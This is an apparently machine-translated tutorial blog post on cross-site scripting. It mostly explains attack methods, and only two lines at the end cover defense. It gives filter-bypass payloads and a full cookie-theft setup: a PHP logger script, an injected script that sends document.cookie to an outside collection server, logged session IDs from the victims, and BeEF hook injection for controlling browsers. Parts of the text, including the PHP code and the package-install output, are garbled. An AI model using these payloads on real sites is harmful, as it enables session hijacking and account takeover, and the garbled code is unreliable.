XSS vulnerability attack principle, attack means and defense skills

Disclaimer: All documents are used for security testing to enhance protection, use it at your own risk.

What is an XSS attack?

XSS refers to that malicious attackers take advantage of the shortcomings of websites that do not escape or filter the data submitted by users, and then add some malicious codes and embed them into web pages. Make any other user access to execute the corresponding embedded code. In order to steal user information, the use of user identity for a certain action or visitors to a virus attack.

Different from other attack methods, most attacks are targeted at the server, while XSS attacks the client, thus indirectly harming the interests of the company or users. Under normal circumstances, XSS attacks are mounted through the page, which have no direct attack effect on the server. However, when users browse the page, their interests will be directly or indirectly damaged.

XSS attack principle:

The principle of XSS attack is that websites do not escape the data submitted by users or do not filter the data sufficiently. Be used by malicious attackers to add some code such as JavaScript,Java, VBScript,ActiveX, Flas, HTML, embedded in the Web page. Make other users access to execute the corresponding embedded code. As a result, user information is leaked, endangering the asset security of the company and users.

What do users usually do directly with XSS attacks?

It is more common to steal accounts of various users directly through XSS attacks, force to send emails, hang horses on websites, and control the victim’s machine to launch other attacks. Usually malicious attackers will use user account information to do other illegal activities that are more aggressive or profitable.

XSS figure

Note: the picture only describes one type of attack, there are other types of attack. Of course, in addition to simulating user login, you can also manipulate user A’s browser online.

Classification of common XSS attacks

1. Reflex XSS attack

   A form that satisfies both the following criteria can be defined as a threat to a reflexive XSS attack.

   • GET Submits the form.
   • There is no restriction on special symbols before the front-end commits.
   • The backend does not test the validity and harmfulness of the submitted content.
   • Capable of generating XSS attack URL links.

2. Stored XSS attacks (also known as persistent XSS threats, which do the most damage)

   • There is no restriction on special symbols before the front-end commits.
   • The backend does not test the validity and harmfulness of the submitted content.
   • To be able toThe submitted content is stored intact and unescaped on the serverAnd display it on the page.

3. DOM TYPE XSS attack

Various tags in XSS scripts

1. A tag in HTML commonly used in XSS attacks.

<iframe>Create an inline frame that contains another document. Commonly known as inline frame.<testarea>Defines a multi-line text input control.<img>The element inserts an image into the web page.<script>Used to define client scriptsCopy the code

2. A method commonly used in the javaScript language for XSS attacks.

Window.location () is used to get the URL of the current page and redirect the browser to the new page. Location.href () returns the full URl.onload () of the currently displayed document. A page or image is loaded complete. onsubmit() confirms that the button is clicked. onError () an error occurred while loading the document or image.Copy the code

• Note: there are few XSS attack scripts involved in this document, if you want to know more attack scripts please Google, I don’t like putian system.

Manually test pages to see if they contain vulnerabilities threatened by XSS attacks

1. Popover warning test

• Passing this popover warning test means that the page is vulnerable to XSS vulnerabilities.

JavaScript popup warning:<script>alert('1')</script>
Copy the code

2. Other XSS tests

JavaScript page redirection:<script>window.location=http://www.baidu.com""</script>HTML page nesting:<iframe src="http://www.baidu.com"></iframe>
Copy the code

Manual test attacks bypass detection methods

1. Use other tags to hide

<img src="#" onerror=alert(/1/)>
<img src="http://.... js"></img>
Copy the code

2. Use case to bypass validation

<ScRIpT>alert('1')</ScRIpT>
Copy the code

3. Using URL,base64 character encoding

<a href="aHR0cHMlM0EvL3d3dy5iYWlkdS5jb20=">test</a>
Copy the code

Collecting User cookies

Do not use for illegal channels, if do it with the consequences!

Using different tags can make the WAF firewall less sensitive.

1. <script>window.open("http://url? cookie="+document.cookie)</script> 2. <script>document.location.href="http://url? cookie="+document.cookie)</script> 3.<script>new Image().src="http://url? cookie="+document.cookie)</script>Copy the code

Cookie collection attacks with stored XSS threats

• Prepare the web server to collect the Cookie information of users subject to XSS.

lqh@lqh:~$ kvmclone collection_of_cookie
Formatting '/var/lib/libvirt/images/collection_of_cookie.qcow2', fmt=qcow2 size=32212254720 backing_file=/var/lib/libvirt/images/.back.qcow2 cluster_size=65536 lazy_refcounts=off refcount_bits=16
Domain collection_of_cookie defined from /etc/libvirt/qemu/collection_of_cookie.xml

VM collection_of_cookie Create
#Clone a server from a back-end disk ready to be a cookie collection machine.

lqh@lqh:~$ virsh start collection_of_cookie
Domain collection_of_cookie started
#Start the cookie collection server

lqh@lqh:~$ virsh console collection_of_cookie
#Connect to terminal[root@localhost ~]# setnet.py 0 192.168.1.51#Set the server IP through the script defined by your own backend disk[root@localhost ~]# exit logout lqh@lqh:~$SSH [email protected] Warning: Permanently added '192.168.1.51' (ECDSA) to the list of known hosts. Last login: Sun Feb 2 13:08:06 2020 Virtual host...#Use remote login to the server

[root@localhost ~]# hostnamectl set-hostname cookieServer
#Setting the host Name
[root@localhost ~]# yum install -y php httpd
#Install HTTPD and PHP environment as I prepare cookie collection on my side to be written in PHPLoaded plug-in: fastestmirror Determining fastest mirrors local | 3.6 kB 00:00 (1/2) : local/group_gz | 165 kB 00:00 (2/2) : Local/primary_db | 6.0 MB 00:00 dependencies are being addressed-->Checking transactions
--->The package httpd.x86_64.0.2.4.6-90. El7.centos will be installed
-->The dependency httpd-tools = 2.4.6-90.el7.centos is being handled, which is required by the package httpd-2.4.6-90.el7.centos
-->The dependency /etc/mime.types is being processed, which is required by the package httpd-2.4.6-90.el7.centos.x86_64
-->The dependency libaprutil-1.so.0()(64bit) is being processed, which is required by the package httpd-2.4.6-90.el7.centos.x86_64
-->The dependency libapr-1.so.0()(64bit) is being processed, which is required by the package httpd-2.4.6-90.el7.centos.x86_64
--->The package php.x86_64.0.5.4.16-46.el7 will be installed
-->The dependency php-common(x86-64) = 5.4.16-46.el7 is being handled, which is required by the package php-5.4.16-46.el7.x86_64
-->The dependency php-CLI (x86-64) = 5.4.16-46.el7 is being handled, which is required by the package phP-5.4.16-46.el7.x86_64
-->Checking transactions
--->The package apr.x86_64.0.1.4.8-5.el7 will be installed
--->The package apr-util.x86_64.0.1.5.2-6.el7 will be installed
--->The package httpd-tools.x86_64.0.2.4.6-90. El7.centos will be installed
--->The package Mailcap.noarch.0.2.1.41-2.el7 will be installed
--->The package php-cli.x86_64.0.5.4.16-46.el7 will be installed
--->The package php-common.x86_64.0.5.4.16-46.el7 will be installed
-->The dependency libzip.so.2()(64bit) is being processed, which is required by the package php-common-5.4.16-46.el7.x86_64
-->Checking transactions
--->The package libzip.x86_64.0.0.10.1-8.el7 will be installed
-->Resolve dependency completionDependencies to solve = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = source size Package framework version = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = are installing: Centos local 2.6m PHP x86_64 5.4.16-46.el7 local 1.4m HTTPD x86_64 2.4.6-90.el7. Centos local 2.6m PHP x86_64 5.4.16-46.el7 local 1.4m Apr-util x86_64 1.4.8-5.el7 local 103 k httpd-tools x86_64 2.4.6-9.el7. Centos local 103 k apr-util x86_64 1.5.2-6.el7 local 92 k httpd-tools x86_64 2.4.6-9.el7 91 k libzip x86_64 0.10.1-8.el7 local 48 k mailcap noarch 2.1.41-2.el7 local 31 k PHP -cli x86_64 5.4.16-46.el7 local 2.7 M php-common x86_64 5.4.16-46.el7 local 565 k = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = 2 installation package (+ 7 relied on package) total downloads: 7.7 M installation size: 27 M Downloading packages: (1/9) : apr - 1.4.8-5. El7. X86_64. RPM | 103 kB 00:00 (2/9) : Apr - util - 1.5.2-6. El7. X86_64. RPM | 92 kB 00:00 (3/9) : HTTPD - tools - 2.4.6-90. El7. Centos. X86_64. RPM | 91 kB 00:00 (4/9) : HTTPD - 2.4.6-90. El7. Centos. X86_64. RPM | 2.7 MB 00:00 (5/9) : libzip 0.10.1-8 el7. X86_64. RPM | 48 kB 00:00 (6/9) : Mailcap 2.1.41-2. El7. Noarch. RPM | 31 kB 00:00 (7/9) : PHP - 5.4.16-46. El7. X86_64. RPM | 1.4 MB 00:00 (8/9) : The PHP cli - 5.4.16-46. El7. X86_64. RPM | 2.7 MB 00:00 (9/9) : PHP - common - 5.4.16-46. El7. X86_64. RPM | 565 kB 00:00 -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- a total of 69 MB/s | 7.7 MB 00:00 Running Transaction Check Running Transaction test Succeeded Running Transaction Apr-util-1.5.2-6.el7.x86_64 2/9 Installing: apr-util-1.5.2-6.el7.x86_64 2/9 installing: apr-util-1.5.2-6.el7.x86_64 2/9 installing: Httpd-tools-2.4.6-90.el7.centos.x86_64 3/9 Installing: libzip-0.10.1-8.el7.x86_64 4/9 installing: httpd-tools-2.4.6-90.el7.centos.x86_64 3/9 installing: libzip-0.10.1-8.el7.x86_64 4/9 installing: Php-common-5.4.16-46.el7.x86_64 5/9 Installing: php-cli-5.4.16-46.el7.x86_64 6/9 installing: Mailcap-2.1.41-2.el7.noarch 7/9 Installing: httpd-2.4.6-90.el7.centos.x86_64 8/9 installing: phP-5.4.16-46.el7.x86_64 9/9 Verifying: mailcap-2.1.41-2.el7.noarch 7/9 installing: httpd-2.4.6-90.el7.centos.x86_64 8/9 installing: phP-5.4.16-46.el7.x86_64 9/9 verifying: Mailcap-2.1.41-2.el7.noarch 1/9: httpd-tools-2.4.6-90.el7.centos.x86_64 2/9: httpd-tools-2.4.6-90.el7.centos.x86_64 Apr-util-1.5.2-6.el7.x86_64 4/9 validation: httpd-2.4.6-90.el7.centos. X86_64 4/9 validation: apr-1.4.8-5.el7.x86_64 5/9 validation: httpd-2.4.6-90.el7.centos. The PHP cli - 5.4.16-46. El7. In 6/9 x86_64 validation: libzip 0.10.1-8. El7. In 7/9 x86_64 validation: PHP - 5.4.16-46. El7. In 8/9 x86_64 validation: Php-common-5.4.16-46.el7.x86_649/9 Installed: httpd.x86_64 0:24.6-90. el7.centos php.x86_64 0:5.4.16-46.el7 installed as dependency: X86_64 0:1.4.8-5.el7 apr-util. X86_64 0:1.5.2-6.el7 httpd-tools.x86_64 0:24.6-90. el7.centos libzip.x86_64 X86_64 0:5.4.16-46.el7 php-common.x86_64 0:5.4.16-46.el7 end! [root@localhost ~]# vim /var/www/html/get_c.php <? PHP echo "sorry, the site is busy, please try again later! ; $Cookie = $_GET[' Cookie ']; $cookie_Log = fopen("/log/ cookie_Log ", "a"); $cookie_Log = fopen("/log/cookie_log.log", "a"); Log file path :/log fwrite($cookie_log, $cookie. "\n"); // Write the cookie to the stream object with a newline to distinguish fclose($cookie_Log); // Close the stream object? >#Write a PHP Web page to collect cookies from your users and shout that PHP is the best language in the world

[root@localhost ~]# mkdir /log
[root@localhost /]# chown apache:apache /log/
#Create /logDirectory and set the directory owner to Apache

[root@localhost ~]# systemctl start httpd
#Start the HTTPD service[root@localhost HTTPD]# curl localhost/get_c.php [root@localhost httpd]##Test whether the establishment is successful
Copy the code

• Build XSS code and populate it on a WEB page.

<script>document.location.href="Http://192.168.1.51/get_c.php? cookie="+document.cookie</script>
Copy the code

• If there is a word limit at the top of the page, we use the browser’s developer tools to remove it.

• Wait for the user to trigger the XSS attack code and commit the Cookie to the previously prepared server.

[root@localhost httpd]# tail -f /log/cookie_log.log
security=low; PHPSESSID=ebe8mv0bmj3f7lmht979g3ssq2
security=low; PHPSESSID=tckdm41rl64a4h33jakdo54mv2; acopendivids=swingset,jotto,phpbb2,redmine; acgroupswithpersist=nada
security=low; PHPSESSID=tckdm41rl64a4h33jakdo54mv2; acopendivids=swingset,jotto,phpbb2,redmine; acgroupswithpersist=nada
Copy the code

• Make use of the collected cookies.

Automated XSS threat testing

• Use the powerful BeEF open source penetration testing framework, through XSS vulnerabilities with JS scripts and Metasploit penetration.

• Install the BeEF

root@lqh:/home/lqh# sudo apt-add-repository -y ppa:brightbox/ruby-ng
#To add a Ruby repository, you must have a Ruby environment

root@lqh:/home/lqh# apt-get install ruby -y
#Installing the Ruby Environment

root@lqh:/home/lqh# gem install bundler
#Install the bundler

root@lqh:/home/lqh# sudo apt-add-repository -y ppa:rael-gc/rvm
#Add the RVM repository

root@lqh:/home/lqh# sudo apt-get install rvm -y
#Install RVM

root@lqh:/home/lqh# git clone https://gitee.com/lai_qinghua_admin/beef.git
# cloneIt's fast on Gitee, so you can use my open one

root@lqh:/home/lqh# cd beff
root@lqh:/home/lqh#  ./install
#Start the installation

#Where do I need to change rubyGems default source to Ali Cloud

root@lqh:/# gem sources
#Viewing the Default source

root@lqh:/# gem sources --remove
#Remove the default source based on the result returned by the up-scaling command

root@lqh:/# gem sources -a https://mirrors.aliyun.com/rubygems/
#Add Aliyunyuan

root@lqh:/# gem update --system
#Start upgrading thief fast

#Go back to the BeEF folder to execute the installation script and you won't get stuck.
Latest version already installed. Done.
[INFO]  Detecting bundler gem...
[INFO]  bundler gem is installed
Installing required Ruby gems...
#Looks like the RubyGems version is over.

#There is also the inability to run installation scripts as root
[DEPRECATED] The `--without` flag is deprecated because it relies on being remembered across bundler invocations, which bundler will no longer do in future versions. Instead please use `bundle config set without 'test development'`, and stop using this flag
Don't run Bundler as root. Bundler can ask for sudo if it is needed, and installing your bundle as root will break this
application for all non-root users on this machine.

#An error was reported due to upgrading to the highest version"Where the 'ConfigMap method 'is deprecated""Have to downgrade RubyGems again
/usr/lib/ruby/vendor_ruby/rubygems/defaults/operating_system.rb:30: warning: constant Gem::ConfigMap is deprecated

#Github officials haven't solved the problem yet and they can't figure it out themselves, so sorry, I've decided to enable Kali


Copy the code

• After BeEF is opened, it will monitor the 3000 port of all network cards, and we can directly connect to the interface provided by it through web pages./ UI /panel

• It provides our XSS attack code./hook.js

• At the start of the injection point has been recognized by the injection of < script SRC = “http://192.168.122.148:3000/hook.js” > < / script >

• As long as it is not offline, it can control its browser and do all kinds of things.

— — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — here BeEf attack operation ignored — — — — — — — — — — — — — — — — — — — — — — — — — — — — —

Defensive skills

• Converts submitted content into a web page entity, preventing browsers from parsing it as an HTML element.

• Disables user input to submit special symbols.